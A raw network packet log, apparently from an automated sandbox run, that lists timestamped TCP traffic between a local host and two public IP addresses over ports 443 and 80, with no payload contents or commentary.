Apr 24, 2024 06:54:14.878770113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.878783941 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.878844976 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.878849030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.879637003 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.879657984 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.879698038 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.879702091 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.879713058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.880790949 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.880805016 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.880853891 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.880858898 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.880870104 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.881592035 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.881609917 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.881652117 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.881656885 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.881675959 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.882827997 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.882842064 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.882899046 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.882904053 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.883563995 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.883583069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.883621931 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.883625984 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.883649111 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.884608030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.884624958 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.884682894 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.884687901 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.886049986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.886070967 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.886111975 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.886116028 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.886141062 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.887706041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.887721062 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.887783051 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.887789011 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.889076948 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.889096975 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.889134884 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.889141083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.889163017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.890093088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.890108109 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.890163898 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.890168905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.891222000 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.891242027 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.891283035 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.891287088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.891304970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892029047 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892043114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892087936 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892092943 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892110109 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892338037 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892357111 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892391920 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892395973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892416954 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892628908 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892642021 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.892687082 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.892693996 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893011093 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893029928 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893064022 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.893068075 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893086910 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.893363953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893377066 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893415928 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.893420935 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893440008 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.893739939 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893759966 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893794060 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.893798113 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.893826962 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.894140005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894153118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894196987 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.894201040 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894443989 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894462109 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894520044 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.894520044 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.894526005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894757986 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894773006 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894814968 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.894819975 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.894838095 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.895101070 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.895118952 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.895149946 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.895154953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.895176888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.895401955 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.895414114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.895463943 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.895468950 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896049976 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896070957 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896110058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.896115065 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896126986 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.896408081 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896421909 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896460056 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.896465063 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896492004 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.896913052 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896931887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896967888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.896971941 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.896989107 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.897305012 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.897316933 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.897357941 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.897362947 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.897377968 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.898300886 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.898322105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.898359060 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.898364067 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.898382902 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.899240017 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.899252892 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.899307013 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.899311066 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.900058031 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.900077105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.900115013 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.900119066 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.900127888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.901041985 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.901057005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.901103973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.901108980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.901952982 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.901972055 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.902009964 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.902014971 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.902030945 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.902928114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.902940989 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.902991056 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.902995110 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.903955936 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.903975964 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.904012918 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.904017925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.904031992 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.904897928 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.904913902 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.904968977 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.904973030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.905682087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.905700922 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.905735970 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.905740023 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.905755997 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.906583071 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.906596899 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.906639099 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.906642914 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.906658888 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.907510996 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.907530069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.907571077 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.907574892 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.907592058 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.908313036 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.908370972 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.908376932 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.909250021 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.909265041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.909308910 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.909313917 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.909333944 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.910129070 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.910145998 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.910192013 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.910197973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.910207987 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.910964012 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.910979033 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.911036015 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.911040068 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.911058903 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.911927938 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.911942005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.911986113 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.911990881 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.912007093 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.912878990 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.912893057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.912939072 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.912942886 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.912955999 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.913774967 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.913789034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.913837910 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.913842916 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.914819956 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.914833069 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.914884090 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.914889097 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.915775061 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.915788889 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.915836096 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.915839911 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.916538000 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.916552067 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.916601896 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.916606903 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.917536020 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.917550087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.917594910 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.917599916 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.917613029 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.918339968 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.918354988 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.918416023 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.918421030 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.919363022 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.919384003 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.919418097 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.919423103 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.919450998 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.920243979 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.920258999 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.920300961 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.920305967 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.920315027 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.921102047 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.921116114 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.921166897 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.921173096 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.921189070 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.921211004 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.921235085 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.923362017 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:17.214482069 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.374345064 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.374429941 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.374543905 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.539608955 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.539632082 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.539695978 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.539724112 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.539736986 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.539926052 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.540029049 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540096045 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540142059 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.540160894 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540214062 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540245056 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540256977 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.540311098 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.540353060 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.699448109 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699471951 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699517965 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.699527979 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699615002 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699656010 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.699717045 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699894905 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699909925 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.699938059 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.699974060 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700016022 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700047016 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700165033 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700208902 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700251102 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700289011 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700336933 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700344086 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700392008 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700433016 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700434923 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700479031 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700520992 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700525999 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700620890 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700664997 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.700721025 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700820923 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.700860977 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859406948 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859435081 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859452963 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859467030 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859479904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859493971 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859529972 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859560966 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859615088 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859678030 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859719992 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859733105 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859806061 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859847069 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859859943 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859920025 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.859960079 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.859973907 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860083103 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860131979 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860163927 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860209942 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860250950 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860321045 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860436916 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860476971 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860491037 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860593081 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860632896 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860678911 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860693932 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860733986 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860743046 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860800982 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860843897 CEST	49733	80	192.168.2.4	192.3.243.154
